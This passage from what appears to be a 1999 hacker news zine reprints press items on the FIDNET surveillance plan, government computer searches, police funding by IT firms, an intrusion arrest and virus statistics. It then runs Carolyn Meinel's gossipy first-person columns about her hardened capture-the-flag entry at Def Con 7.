  4217.  
  4218.      Over the last three years, the Pentagon has begun to string together entire
  4219.      network surveillance systems using filters that report data to a central site,
  4220.      much as a burglar alarm might be reported at the local police station. 
  4221.  
  4222.      Officials said such a system might have protected against intrusions
  4223.      recently reported in computers at the Bureau of Labor Statistics, which
  4224.      produces information like the consumer price index that can affect the
  4225.      performance of the stock market. 
  4226.  
  4227.      The draft of the plan, which has been circulated widely within the
  4228.      executive branch, has generated concern among some officials over its
  4229.      privacy implications. Several officials involved in the debate over the plan
  4230.      said that the situation was "fluid" and that many aspects were still not final.
  4231.  
  4232.      The report is vague on several crucial points, including the kinds of data to
  4233.      be collected and the specific Federal and corporate computer networks to
  4234.      be monitored. The report also lacks details about the ways information
  4235.      collected in non-Governmental agencies would be maintained and under
  4236.      what conditions it would be made available to law enforcement personnel. 
  4237.  
  4238.      Government officials said that the National Security Council was
  4239.      conducting a legal and technical review of the plan and that a final version
  4240.      is to be released in September, subject to President Clinton's approval. 
  4241.  
  4242.      The plan was created in response to a Presidential directive in May 1998
  4243.      requiring the Executive Branch to review the vulnerabilities of the Federal
  4244.      Government's computer systems in order to become a "model of
  4245.      information and security." 
  4246.  
  4247.      In a cover letter to the draft Clinton writes: "A concerted attack on the
  4248.      computers of any one of our key economic sectors or Governmental
  4249.      agencies could have catastrophic effects." 
  4250.  
  4251.      But the plan strikes at the heart of a growing controversy over how to
  4252.      protect the nation's computer systems while also protecting civil liberties --
  4253.      particularly since it would put a new and powerful tool into the hands of the
  4254.      F.B.I. 
  4255.  
  4256.      Increasingly, data flowing over the Internet is becoming a vital tool for law
  4257.      enforcement, and civil liberties experts said law enforcement agencies
  4258.      would be under great temptation to expand the use of the information in
  4259.      pursuit of suspected criminals. 
  4260.  
  4261.      The draft of the plan "clearly recognizes the civil liberties implications," said
  4262.      James X. Dempsey, staff counsel for the Center for Democracy and
  4263.      Technology, a Washington civil liberties group, "But it brushes them away."
  4264.  
  4265.      The draft states that because Government employees, like those of many
  4266.      private companies, must consent to the monitoring of their computer
  4267.      activities, "the collection of certain data identified as anomalous activity or
  4268.      a suspicious event would not be considered a privacy issue." 
  4269.  
  4270.      Dempsey conceded the legal validity of the point, but said there was
  4271.      tremendous potential for abuse. 
  4272.  
  4273.      "My main concern is that Fidnet is an ill-defined monitoring system of
  4274.      potentially broad sweep," he said. "It seems to place monitoring and
  4275.      surveillance at the center of the Government's response to a problem that
  4276.      is not well suited to such measures." 
  4277.  
  4278.      The Federal Government is making a concerted effort to insure that civil
  4279.      liberties and privacy rights are not violated by the plan, Hunker said. 
  4280.  
  4281.      He said that data gathered from non-Government computer networks will
  4282.      be collected separately from the F.B.I.-controlled monitoring system at a
  4283.      separate location within a General Services Administration building. He
  4284.      said that was done to keep non-Government data at arm's length from law
  4285.      enforcement. 
  4286.  
  4287.      The plan also has drawn concern from civil libertarians because it blends
  4288.      civilian and military functions in protecting the nation's computer networks.
  4289.      The draft notes that there is already a Department of Defense "contingent"
  4290.      working at the F.B.I.'s infrastructure protection center to integrate
  4291.      intelligence, counterintelligence and law enforcement efforts in protecting
  4292.      Pentagon computers. 
  4293.  
  4294.      "The fight over this could make the fight over encryption look like nothing,"
  4295.      said Mary Culnan, a professor at Georgetown University who served on a
  4296.      Presidential commission whose work led to the May 1998 directive on
  4297.      infrastructure protection. 
  4298.  
  4299.      "The conceptual problem is that there are people running this program who
  4300.      don't understand how citizens feel about privacy in cyberspace." 
  4301.  
  4302.      The Government has been discussing the
  4303.      proposal widely with a number of industry
  4304.      security committees and associations in recent
  4305.      months. 
  4306.  
  4307.      Several industry executives said there is still reluctance on the part of
  4308.      industry to directly share information on computer intrusions with law
  4309.      enforcement. 
  4310.  
  4311.      "They want to control the decision making process," said Mark Rasch, vice
  4312.      president and general counsel of Global Integrity, a company in Reston,
  4313.      Va., coordinating computer security for the financial services industries. 
  4314.  
  4315.      One potential problem in carrying out the Government's plan is that
  4316.      intrusion-detection software technology is still immature, industry
  4317.      executives said. 
  4318.  
  4319.      "The commercial intrusion detection systems are not ready for prime time,"
  4320.      said Peter Neumann, a computer scientist at SRI International in Menlo
  4321.      Park, Calif., and a pioneer in the field of intrusion detection systems. 
  4322.  
  4323.      Current systems tend to generate false alarms and thus require many
  4324.      skilled operators. 
  4325.  
  4326.      But a significant portion of the $1.4 billion the Clinton Administration has
  4327.      requested for computer security for fiscal year 2000 is intended to be spent
  4328.      on research, and Government officials said they were hopeful that the
  4329.      planned effort would be able to rely on automated detection technologies
  4330.      and on artificial intelligence capabilities. 
  4331.  
  4332.      For several years computer security specialists have used software
  4333.      variously known as packet filters, or "sniffers," as monitoring devices to
  4334.      track computer intruders. Like telephone wiretaps, such tools can be used
  4335.      to reconstruct the activities of a computer user as if a videotape were
  4336.      made of his computer display. 
  4337.  
  4338.      At the same time, however, the software tools are routinely misused by
  4339.      illicit computer network users in stealing information such as passwords or
  4340.      other data. 
  4341.  
  4342.      Commercial vendors are beginning to sell monitoring tools that combine
  4343.      packet filtering with more sophisticated and automated intrusion detection
  4344.      software that tries to detect abuse by looking for behavior patterns or
  4345.      certain sequences of commands. 
  4346.  
  4347.      @HWA
  4348.      
  4349. 28.0 Feds Get Gov Employees to Sign Away Rights 
  4350.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
  4351.  
  4352.      From HNN http://www.hackernews.com/
  4353.  
  4354.      contributed by Evil Wench 
  4355.      Intelligence Authorization Act has been passed by the
  4356.      Senate, this new bill will give federal law enforcement
  4357.      new powers to search government computers belonging
  4358.      to individuals who have access to classified information.
  4359.      The bill requires employees who need access to
  4360.      classified information to sign a waiver allowing law
  4361.      enforcement officials to "access information stored in
  4362.      computers used in the performance of government
  4363.      duties." (They can't take your rights away but now
  4364.      they can get you to sign them away.) 
  4365.  
  4366.      Federal Computer Week 
  4367.      http://www.fcw.com/pubs/fcw/1999/0719/web-intell-7-23-99.html
  4368.      
  4369.      
  4370.      JULY 23, 1999 . . . 15:05 EDT 
  4371.  
  4372.  
  4373.      Intelligence bill grants feds new computer security
  4374.      powers 
  4375.  
  4376.      BY DANIEL VERTON (dan_verton@fcw.com)
  4377.  
  4378.      The Senate this week voted unanimously to pass the fiscal 2000 Intelligence
  4379.      Authorization Act, which would provide federal law enforcement officials new
  4380.      authority to search government computers belonging to individuals who have
  4381.      access to classified information. 
  4382.  
  4383.      The new computer security provision comes in the wake of reports of espionage
  4384.      by China at the nation's nuclear laboratories and was part of a larger effort by
  4385.      the Senate Select Committee on Intelligence to improve government
  4386.      counterintelligence procedures. 
  4387.  
  4388.      According to Sen. Richard C. Shelby (R-Ala.), chairman of the Senate Select
  4389.      Committee on Intelligence, the bill requires employees who need access to
  4390.      classified information to sign a waiver allowing law enforcement officials to
  4391.      "access information stored in computers used in the performance of government
  4392.      duties." The provision is aimed specifically at enhancing the FBI's ability to
  4393.      investigate cases of possible espionage sooner rather than later. 
  4394.  
  4395.      The thorny issue of granting access to government computers for the purposes
  4396.      of investigating wrongdoing came into the limelight last month when officials at
  4397.      the Defense Threat Reduction Agency allegedly attempted to access the
  4398.      computer belonging to a senior technology trade advisor as he testified before
  4399.      Congress [FCW, July 19, 1999]. 
  4400.  
  4401.      "This provision is intended to avoid the problems we have seen with the FBI's
  4402.      reluctance to access 'government' computers without a warrant in the course of
  4403.      an espionage investigation," Shelby said. "There should be no question that
  4404.      investigative agencies may search the computer of an individual with access to
  4405.      classified information."
  4406.  
  4407.      @HWA
  4408.      
  4409. 29.0 Local Cops Funded by IT Industry 
  4410.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4411.     
  4412.      From HNN http://www.hackernews.com/
  4413.  
  4414.       contributed by Arik 
  4415.       Pulling from the LA Times article that we linked to on
  4416.       Monday, the UK Register runs a story on how local US
  4417.       Police departments are legally accepting large grants
  4418.       from IT firms in exchange for going after pirates.
  4419.       Companies such as Intel and Hewlett-Packard offer cash
  4420.       and other perks to local law enforcement agencies while
  4421.       they work on cases beneficial to the corporation. Local
  4422.       Police agencies see nothing wrong with this. (Why hire
  4423.       private detectives when you can just hire the local
  4424.       police force.) 
  4425.  
  4426.      The UK Register
  4427.      http://www.theregister.co.uk/990727-000017.html
  4428.      
  4429.      Posted 27/07/99 3:57pm by Tim Richardson
  4430.   
  4431.      US police funded by IT giants
  4432.    
  4433.      Hi-tech companies are paying out thousands of dollars to hard-up police departments in the
  4434.      US to help combat computer-related crime. 
  4435.    
  4436.      According to a report in the LA Times, Intel regularly slips police departments in Oregon
  4437.      $100,000 a year to help pay the wages of a few law enforcement professionals. 
  4438.    
  4439.      It's also more than happy to part with $10,000 to kit out the odd sheriff's department with a
  4440.      wire-tap or two. 
  4441.    
  4442.      Then there's Hewlett-Packard which is more than happy to let police officers use its
  4443.      corporate jet if it helps catch a computer villain. 
  4444.    
  4445.      Snag is, some people think this is an abuse of the system. They claim these firms are
  4446.      "buying justice" in their bid to crackdown on computer crime which reportedly cost the US
  4447.      $3 billion last year. 
  4448.    
  4449.      But one outspoken officer told the LA Times that such allegations were way out of line. 
  4450.    
  4451.      "If you're inferring that we're paid off, that's not right," Sgt Michael Tsuchida of the
  4452.      Sacramento County Sheriff's Office told the LA Times. 
  4453.    
  4454.      "I'll eat your dinner, sleep in your hotel and still arrest you if you're breaking the law," he
  4455.      said. 
  4456.    
  4457.      It's nice to know that the judgement of the boys in blue is not swayed by a few greenbacks. 
  4458.    
  4459.      In a way, the hacks at The Register are no different. They swan off on fancy
  4460.      all-expenses-paid press trips, get taken out to swanky restaurants -- and still manage to
  4461.      dish the dirt about their hosts. 
  4462.    
  4463.      The Register -- eating the hand that feeds IT. « 
  4464.      
  4465.      @HWA
  4466.    
  4467.   
  4468. 30.0 Two Arrested for Corporate Espionage 
  4469.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4470.      
  4471.      From HNN http://www.hackernews.com/
  4472.  
  4473.       contributed by operand 
  4474.       Interactive Connections, now known as Screaming
  4475.       Media, has had two former employees arrested on
  4476.       Tuesday on charges they allegedly broke into its
  4477.       computer system and stole secret business plans. If
  4478.       convicted, they face a possible maximum prison term of
  4479.       five years. They allegedly copied various proprietary
  4480.       files and software belonging to Interactive Connections.
  4481.       It is unknown what they then did with the information. 
  4482.  
  4483.       Wired
  4484.       http://www.wired.com/news/news/politics/story/20966.html
  4485.       
  4486.       Turkey-Day Crackers Arrested
  4487.       Reuters 
  4488.  
  4489.       2:10 p.m.  27.Jul.99.PDT
  4490.       Two former employees of Interactive
  4491.       Connections, now known as Screaming
  4492.       Media, were arrested on Tuesday on
  4493.       charges they allegedly broke into its
  4494.       computer system and stole secret
  4495.       business plans. 
  4496.  
  4497.       Ira Lee, 29, and Zissis Trabaris, 31, who
  4498.       had worked as software developers at
  4499.       the company, were each charged in
  4500.       federal court in Manhattan with one
  4501.       count of unlawful and unauthorized
  4502.       computer intrusion. If convicted, they
  4503.       face a possible maximum prison term of
  4504.       five years. 
  4505.  
  4506.       Interactive Connections provides news
  4507.       filtering and distribution services, mostly
  4508.       for Web sites. Its clients include America
  4509.       Online and Sun Microsystems, federal
  4510.       prosecutors said. 
  4511.  
  4512.       According to the complaint, the alleged
  4513.       crime occurred after the defendants'
  4514.       employment at Interactive Connections
  4515.       ended and shortly after The Wall Street
  4516.       Journal ran a favorable article about the
  4517.       company. The newspaper reported that
  4518.       the company was backed by James
  4519.       Robinson, former chief executive of
  4520.       American Express Co. 
  4521.  
  4522.       The defendants allegedly entered
  4523.       Interactive's computer system from Lee's
  4524.       home computer on 25 November, the
  4525.       night before Thanksgiving. They allegedly
  4526.       stayed on the system for about four
  4527.       hours into Thanksgiving morning and
  4528.       copied various proprietary files and
  4529.       software belonging to Interactive and
  4530.       then transferred the information to
  4531.       various computers that the two men
  4532.       controlled, the complaint charged. 
  4533.  
  4534.       Copyright 1999 Reuters Limited. 
  4535.       
  4536.       @HWA
  4537.       
  4538. 31.0 Virus Infestations On the Rise 
  4539.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4540.      
  4541.       From HNN http://www.hackernews.com/
  4542.      
  4543.       contributed by TurTleX 
  4544.       Computer virus infection rates have doubled since 1998
  4545.       and quadrupled since 1997 according to a report
  4546.       released by ICSA. The survey was based on responses
  4547.       from tech departments at 300 U.S. corporations and
  4548.       government agencies. 
  4549.  
  4550.       Newsweek
  4551.       http://www.newsweek.com/nw-srv/tnw/today/cs/cs02mo_1.htm
  4552.       
  4553.       ICSA            
  4554.       http://www.icsa.net/
  4555.       
  4556.       -=-
  4557.       
  4558.       Newsweek
  4559.       http://www.newsweek.com/nw-srv/tnw/today/cs/cs02mo_1.htm
  4560.       
  4561.       TUESDAY, July 27, 1999 
  4562.  
  4563.       Stopping the Spread
  4564.  
  4565.       Are computer viruses becoming an epidemic? A recent survey conducted
  4566.       by ICSA.net, a company that provides computer security information to
  4567.       corporations, reports that computer virus infection rates have doubled since
  4568.       1998 and quadrupled since 1997. Based on responses from tech
  4569.       departments at 300 U.S. corporations and government agencies, the survey
  4570.       also finds a comparable increase in costs. "The cost of having viruses, given
  4571.       the frequency of when you get them and what happens after you get them,
  4572.       is more than doubling every year," Peter Tippett, chairman of ICSA.net, told
  4573.       Newsweek.com. "We can't conclude that anything has happened that will
  4574.       prevent things from becoming twice as bad next year," he adds. 
  4575.  
  4576.       One reason for the rise in infections are rates of transmission, which have
  4577.       dramatically increased in the past several years. Between 1980 and 1995
  4578.       computer viruses were transmitted primarily via floppy disks, usually taking
  4579.       a year or more to become prevalent. By 1995, macro virusesùwhich
  4580.       primarily live in MS Word or Excel documents and spread via file
  4581.       sharingùhad decreased that time to a few months. The most recent
  4582.       generation, dubbed "'Net-enabled" or "communications-enabled" viruses, use
  4583.       the Internet or e-mail to replicate, and can reach epidemic proportions within
  4584.       days. These new viruses could represent the greatest threat thus far. 
  4585.  
  4586.       The solution, Tippett says, is to use anti-virus programs and tools correctly.
  4587.       The survey reported that 83 percent of the companies surveyed had
  4588.       anti-virus software on 90 percent of their computers, but often failed to use
  4589.       it properly. For example, 40 percent of those companies used "periodic
  4590.       scanning" on desktopsùscanning for viruses once a day, for example, or
  4591.       every time the system restartsùinstead of enabling anti-virus programs'
  4592.       full-time background scanning functions. Doing the latter, Tippett advises,
  4593.       increases the chance of discovering the virus before it spreads unknowingly
  4594.       to the next victim. Other advice: protect servers, gateways anddesktops,
  4595.       and update anti-virus programs often. ù Laura Fording 
  4596.       
  4597.       @HWA
  4598.  
  4599.  
  4600. 32.0 Granny Hacker from Heck visits Def Con parts 1 to 3
  4601.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~      
  4602.      From AntiOnline
  4603.      
  4604.      http://www.antionline.com/cgi-bin/News?type=antionline&date=07-12-1999&story=CMDC1.news
  4605.  
  4606.  
  4607.       Granny Hacker From Heck Visits Def Con 
  4608.       Thursday, July 15, 1999 at 16:29:59
  4609.       by Carolyn Meinel - Writing For AntiOnline 
  4610.  
  4611.       July 1, 1999. A staffer from Loompanics calls to say that the Def Con
  4612.       convention staff has ordered them to not sell my "The Happy Hacker: A
  4613.       Guide to Mostly Harmless Hacking" (http://happyhacker.org/buyhh.html)
  4614.       at their upcoming computer criminal soiree.
  4615.  
  4616.       This means war! How can I best stick it to the Def Con d00dz? Oho,
  4617.       their web site (http://www.defcon.org) is advertising a Bastard Operator
  4618.       from Hell (BOFH) (http://www.rangsoc.demon.co.uk/bofh_last.htm)
  4619.       contest. A true BOFH should run a computer with all sorts of tantalizing
  4620.       services. Build something that looks like an eight year old could break in.
  4621.       Then the attacker runs exploit after exploit against the box. And every
  4622.       attack mysteriously SCREWS UP!!! Muhahaha. By offering a prize for
  4623.       the best victim computer, the Def Con guys hops to get better targets
  4624.       for the hackers playing Capture the Flag.
  4625.  
  4626.       Amarillo, TX, July 6 and 7, I'm out there with Happy Hacker Wargame
  4627.       director Vincent Larsen and wargame admin Jon to put together our
  4628.       BOFH entry: Fangz. Ah, yes, Fangz, an Intel box running Red Hat Linux
  4629.       (at least that's what any port scanner would tell you, snicker). It runs ftp,
  4630.       pop3, smtp, a DNS server, telnet with a guest account with no
  4631.       password, guest access to vi and a C compiler; and a Lithium Quake
  4632.       server with back doors in place. Ahem, every service is working
  4633.       according to the RFCs, but not quite running the way hackers would
  4634.       expect:):)
  4635.  
  4636.       OK, let's get this straight. All I did was provide the hardware and use
  4637.       the Hacker Wargame to test various iterations of Vincent and Jon's
  4638.       Process Based Security (http://www.sage-inc.com) modifications to
  4639.       Red Hat Linux. Red Hat is a hacker's paradise. A clean install of the
  4640.       latest version has over 200 ways to break into it. Vincent and Jon's
  4641.       version of Red Hat, however, would make the BOFH himself proud.
  4642.       That's why I decided against entering a FreeBSD or OpenBSD system.
  4643.       They have pretty good security, too. But they don't TORMENT hackers
  4644.       the way Process Based Security does.
  4645.  
  4646.       At sunrise Friday morning, July 9, I caught a ride on the Happy Hacker
  4647.       Godfather's King Air business jet, along with him and Jon. Also there
  4648.       was this giant Texan on board. I asked him, "You look like a bodyguard.
  4649.       You look like you could pick up someone by the neck and hold him out
  4650.       at arm's length."
  4651.  
  4652.       "I'm an interior decorator. That's my story and I'm sticking with it."
  4653.  
  4654.       Nine AM we are on site at the Alexis Park hotel. We stagger along with
  4655.       Fangz, a monitor, laptop, my favorite Ethernet hub, my crummy backup
  4656.       Ethernet hub, lots of spare 10BASE-T cabling, tools, and duct tape just
  4657.       in case I need to tape anyone to the wall.
  4658.  
  4659.       A Def Con "goon" (security guard) helps us out by taking us to the head
  4660.       of the registration line. Who should be handling, um, exceptional cases
  4661.       such as ourselves but Pete Shipley. As his mouth drops with surprise to
  4662.       see us Happy Hacksters out in force, he fails to flash his copyrighted
  4663.       vampire fangs. Now these are very important, copyrighted vampire
  4664.       fangz, er, I mean, fangs. Shipley's lawyer actually sent several letters to
  4665.       the publisher of my Happy Hacker book claiming that Shipley had gotten
  4666.       a copyright on wearing vampire fangs, so the guy on the cover of my
  4667.       book wearing fangs owed Shipley royalties. Or something like this. 
  4668.  
  4669.       Anyhow, the publisher, being a hacker himself (Dr. Mark Ludwig),
  4670.       decided to have a little fun with Shipley. In the second edition he blotted
  4671.       out Shipley's fanged features with a green blob reading "hey man get my
  4672.       face off this cover."
  4673.  
  4674.       Anyhow, I think Mark using Shipley's copyrighted fangs on my book
  4675.       cover is why Shipley can't wear fangs any more. That must be what got
  4676.       Shipley to being such a major enemy of mine. After all, my lady BOFH
  4677.       personality ought to win the adulation of hackers everywhere. LART,
  4678.       LART, who has the LART?;^)
  4679.       (http://www.winternet.com/~eric/sysadmin/lart.1m.html)
  4680.  
  4681.       Shipley swears it isn't because I hacked him at Def Con 3 in front of
  4682.       dozens of witnesses (see Granny Hacker from Heck). Oh, yes, if you
  4683.       are a reporter, contact me and I'll give you phone numbers for two of
  4684.       those witnesses.
  4685.  
  4686.       Well, that fangless Shipley just about ruined my day. What next, would
  4687.       Cult of the Dead Cow's (http://cultdeadcow.com) Deth Vegetable trash
  4688.       can his Mr. T bust and prance on stage in a business suit? 
  4689.  
  4690.       We got Fangz set up pretty quickly. All I did was some physical stuff.
  4691.       Meanwhile, Jon changed the gateway, DNS server and IP address
  4692.       himself because there are some interesting twists to Fangz. Then he
  4693.       spent the next few hours waiting for the Capture the Flag/BOFH
  4694.       contest to start by changing a few more things on Fangz, like the
  4695.       process control tables for the "mv" and "cat" commands. Oh, you say
  4696.       you never heard of Red Hat Linux "process control tables"? Muhahaha.
  4697.  
  4698.       Then... Priest pays me a visit. Priest. He's a tall middle aged guy whose
  4699.       trademark is the loud Hawaiian shirts and shorts he wears at every Def
  4700.       Con. At Def Con 5 he won his "I am the Fed" T-shirt by showing off an
  4701.       FBI badge. Of course I believe everything I see.
  4702.  
  4703.       "Carolyn," he gestures to me. He sidles up close and whispers, "I left the
  4704.       agency a few weeks ago. An Internet startup in California offered me a
  4705.       chance to get rich. I have a nondisclosure agreement for you.
  4706.       Interested?"
  4707.  
  4708.       Of course I like to get rich, too. I sincerely believe that Internet startups
  4709.       like to offer FBI agents tons of money. "Sure."
  4710.  
  4711.       Meanwhile the Capture the Flag/BOFH game has finally gotten started.
  4712.       Less than 100 of the 3,600 Def Con attendees have signed up to play
  4713.       the game. What? Less than one hundred? I ask several players. They all
  4714.       say there are perhaps only 200 people at Def Con who actually know
  4715.       how to break into computers. The rest? Feds, narcs, groupies, and
  4716.       fakes. And BOFHs:):)
  4717.  
  4718.       Suddenly people start shouting. I turn to see a man prancing on top of a
  4719.       table next to the Penguin Palace booth. He is naked except for an
  4720.       extremely tiny g-string. It's a good thing his genitals are tiny enough to fit
  4721.       into it. Then he pulls on his jeans and leads a parade of drooling
  4722.       teenagers out of the room.
  4723.  
  4724.       A tiny waisted bleached blonde with braless boobs in a spaghetti string
  4725.       shirt prances over to some Capture the Flag players. Not only is each
  4726.       boob the size of her head, they are powered by antigravity devices.
  4727.       From time to time she pulls up her shirt and sticks her naked boobs into
  4728.       the faces of the players. They keep on shooing her off -- "We're trying
  4729.       to hack, dammit!" 
  4730.  
  4731.       (to be continued: groupies get drunk and laid; Feds, narcs and Cult of the
  4732.       Dead Cow urge code kiddies to hack more government Web sites so
  4733.       Congress will boost the Information Warfare budget from $1 billion to
  4734.       $1.4 billion; fangz LARTs hackers; Michael Schiffman beefs up his
  4735.       muscles with a bicycle pump; Shipley remains fangless; Priest attempts
  4736.       an entrapment scheme; and Granny Operator from Heck gets into
  4737.       trouble.)
  4738.  
  4739.                                           
  4740.  
  4741.  
  4742.       Granny Hacker Visits Defcon - Part 2 
  4743.       Wednesday, July 21, 1999 at 0:49:12
  4744.       by Carolyn Meinel - Writing For AntiOnline 
  4745.  
  4746.       LetÆs see, where was I. Oh, yes, the lady with the giant breasts
  4747.       powered by antigravity machines is trying to distract people playing the
  4748.       Capture the Flag game against the Bastard Operator from Hell
  4749.       contestants. All the BOFHers are unscathed so far. IÆm standing next to
  4750.       my box, every now and then checking to make sure at least a half dozen
  4751.       people have spawned shells in the guest ac count. I want Fangz to get a
  4752.       real workout! And who should sidle over but Priest, the giant guy in the
  4753.       buzz cut sandy hair and loud Hawaiian shirt who says he is ôno longer
  4754.       with the agency.ö Out of the corner of his mouth he mutters to me, ôDis
  4755.       has been committing too many felonies. If Dis doesnÆt watch out, he will
  4756.       go to jail.ö
  4757.  
  4758.       Dis. ThatÆs one of the two or three hundred handles Brian Martin uses,
  4759.       but who knows, lots of other hackers may use it, too. Or maybe Priest
  4760.       just keeps on confusing Dis with Mitnick or someone like that. I mutter
  4761.       right back, ôItÆs not clear to me that Dis is committing any felonies.ö
  4762.  
  4763.       Hoo, boy, now this is getting interesting. First Priest hints that he can
  4764.       make me rich, then he appeals to my presumed desire for revenge. Lots
  4765.       of people assume that since I am Brian MartinÆs number one obsession
  4766.       (as seen at http://attrition.org), that I must hate him. Au contraire! Today
  4767.       is honesty day, no more kidding around. Martin is my public relations
  4768.       man, working overtime year after year to make sure everyone has heard
  4769.       of and buys my book, The Happy Hacker. By publicizing his fictional
  4770.       accounts of how I hacked 303.org and sekurity.org and let us NOT
  4771.       FORGET the New York Times, Martin has persuaded countless
  4772.       teenagers that I am a brilliant evil genius granny.
  4773.  
  4774.       Oh, while we are on the topic of honesty, Priest just emailed me to
  4775.       advise that he just might sue me for the first installment of Granny
  4776.       Hacker from Heck Goes to Def Con. LetÆs see, what are his exact
  4777.       words, ôI have to talk to my lawyer about a lawsuit...I at no time
  4778.       represented my self as an FBI agent nor did I ever display a 'badge' at
  4779.       Defcon 5 to get a Fed t-shirt. Further, at no time did I aproach you with
  4780.       an offer of employment or a commentary on what my orgainzation was
  4781.       doing.ö Hmmm, another man from an alternate universe. I think his
  4782.       alternate universe is at http://www.exo.com, phone them up and they
  4783.       will give you a truly amazing shell account from which you can entertain
  4784.       yourself with the file permissions of the other users.
  4785.       
  4786.       LetÆs see if I have this straight. Priest, a fictional entity who ran Def
  4787.       Con 7, and who has variously claimed to be an FBI agent and involved
  4788.       in a get rich quick Internet startup scheme, is trying to figure out how to
  4789.       sue the Granny Hacker from Heck for a humorous article that has lots
  4790.       of witnesses. If you have any leads on this manÆs true identity, or want
  4791.       to add to reports of who this man has claimed to be from time to time,
  4792.       please contact me at 505-281-9675. ôDonÆt pay attention to the man
  4793.       behind the curtain...ö
  4794.       
  4795.       Now, back to our regularly scheduled programming, Friday July 9. Jon
  4796.       takes a turn guarding Fangz, our Bastard Operator From Hell
  4797.       contestant. I go to the main ballroom to catch the first round of ôSpot the
  4798.       Fed.ö I pass a room out of which rock music booms. There are fog
  4799.       machines, spotlights waving about. I notice more young women than I
  4800.       had ever before seen at a Def Con, mostly beautiful, dancing with
  4801.       hackers in that party room. More gorgeous women lounge in the
  4802.       hallway, awkwardly flirting and beckoning. Are they hoping to marry the
  4803.       next Bill Gates? They certainly donÆt have the look of Las Vegas
  4804.       prostitutes, not even the lady with the antigravity boobs. ThereÆs
  4805.       intelligence in those eyes. I briefly think of Tracy Baldwin, a new FBI
  4806.       agent, who came to Albuquerque for her first assignment out of
  4807.       Quantico. BaldwinÆs young, beautiful, tense like a coiled spring. Some of
  4808.       these women in the hallway remind me of her. 
  4809.       
  4810.       Oh, yes, last November I gave Baldwin a hard time when she tried to
  4811.       convince me she might arrest me if I didnÆt take a lie detector test about
  4812.       whether I hacked the New York Times. So now she gets to put up with
  4813.       being in a Granny Hacker story.
  4814.       
  4815.       In the ballroom, Priest is on stage with a microphone. He booms out,
  4816.       ôTo win your æI spotted the FedÆ T-shirt, you have to identify someone
  4817.       who carries a badge and has the power to arrest. Informers donÆt count.
  4818.       You know how you spot an informer, donÆt you? HeÆs someone who
  4819.       was raided and got back out on the street within 24 hours.ö
  4820.       
  4821.       That made me think. A story in Forbes magazine last January had
  4822.       reported that the FBI had raided Brian Martin -- yet had not arrested
  4823.       him. According to an employee of the Internet Service Provider Martin
  4824.       uses (Inficad), not long thereafter ôWe were served a subpoena by the
  4825.       Fed's to perform certain actions on the attrition box co-located at our
  4826.       facility. As we do with all law enforcement matters we complied, and
  4827.       they performed what was required and permitted under the subpoena.ö
  4828.       
  4829.       Many in that room know about MartinÆs FBI raid. Some in that room
  4830.       remember Priest claiming to be a Fed. Why would a Fed, even an
  4831.       ex-Fed (if Priest was telling me the truth) be trying to publicly finger
  4832.       Martin as a supposed informant? All in good fun, IÆm sure.
  4833.       
  4834.       A young man sitting next to me leans over. ôWho is this Priest guy? He
  4835.       seems to be running Def Con.ö 
  4836.       
  4837.       I dunno, maybe being a ficticious character is his profession.
  4838.       
  4839.       ###
  4840.       
  4841.       Near midnight I am hovering over a laptop and hear a voice booming,
  4842.       ôYou. WeÆre closing down for the night. Out. Now.ö I look up and see a
  4843.       knot of hackers scurrying for the nearest exit, behind them Priest playing
  4844.       the role of Nazi SS man. He swivels, points with outstretched arm at the
  4845.       next nearest group. ôYou. Out. Now.ö He strides to another group. 
  4846.       ôYou. Out. Now.ö 
  4847.       
  4848.       I am amazed. ArenÆt hackers supposed to be anti-authoritarian? IsnÆt
  4849.       herding hackers like herding cats? Not here.
  4850.       
  4851.       Oops, IÆm wrong. A departing group breaks up and scatters rather than
  4852.       making it to the exit. Priest catches on within seconds. He points them
  4853.       out one by one: ôI told you, out. Now.ö
  4854.       
  4855.       When he has cleared the room of all but those of use playing the hacker
  4856.       war game, he comes over to us, now relaxed.
  4857.       
  4858.       I gesture at Fangz. ôI donÆt want to leave until everyone else is out of
  4859.       the room. I worry about physical sabotage of my Bastard Operator from
  4860.       Hell entry.ö
  4861.       
  4862.       ôNo problem.ö 
  4863.       He lets me be the last non-staff person out.
  4864.       
  4865.       ###
  4866.       
  4867.       Saturday morning. July 10, 1999. IÆm waiting by the pool for the con to
  4868.       reopen. A swarthy fellow speaks. ôCarolyn, IÆm a friend of Zyklon.ö
  4869.       
  4870.       ôCan you tell me just why, when he hacked the White House Web site,
  4871.       he called me a crack whore?ö
  4872.       
  4873.       ôIÆll ask. By the way, I have your Happy Hacker book. Loved it.ö
  4874.  
  4875.       I canÆt resist plugging my book. Buy out the latest printing, folks, and
  4876.       maybe IÆll shut up. Maybe not:)
  4877.  
  4878.       ###
  4879.  
  4880.       The hacking game is in full swing. A dumpy little fellow comes over to
  4881.       me. ôHi, remember I called you on the phone? IÆm a reporter from
  4882.       Rolling Stone. Can you tell me why so many hackers hate you so much?
  4883.       They wonÆt ever tell me why, they just say æCarolyn sucks.Æö
  4884.  
  4885.       ôThey donÆt all hate me, just some noisy ones. Why donÆt you talk to
  4886.       these young people?ö I introduce him to a group of teenage boys who
  4887.       have clustered around me to get hints about my entry in the game:
  4888.       ôFangz.ö Stuff like I tell them to use the pasv command to make its ftp
  4889.       server work. Sorry, Fangz is a little primitive, but the fewer features on
  4890.       its services, the harder it is to hack. Hey, give us credit, itÆs RFC
  4891.       compliant and at least we donÆt force players to use tftp, or cut and
  4892.       paste stuff through a terminal emulation program!
  4893.  
  4894.       The teens crowd around the reporter. ôTell people most hackers are
  4895.       good guys! We donÆt commit crime! We make the Internet a better
  4896.       place!ö they chorus.
  4897.  
  4898.       A tall, thin young man in skinhead garb and haircut walks up and hands
  4899.       me a flyer. It is about the new Web site, ôNetcriminals.org.ö It has a
  4900.       fake dossier on me, along with fake dossiers for several other people.
  4901.       Skinhead asks, ôDo you know who I am?ö
  4902.  
  4903.       I shake my head.
  4904.       He gives a tight grin. ôNetmask.ö
  4905.  
  4906.       Netmask. It is the first time we have met in real life, yet over the years
  4907.       he has occasionally sent me demented, obscene, yet humorous emails.
  4908.       Some people might say he must be my kind of guy, but ask my fellow
  4909.       choir memebers at St. Luke, IÆm just a sweet old lady.
  4910.  
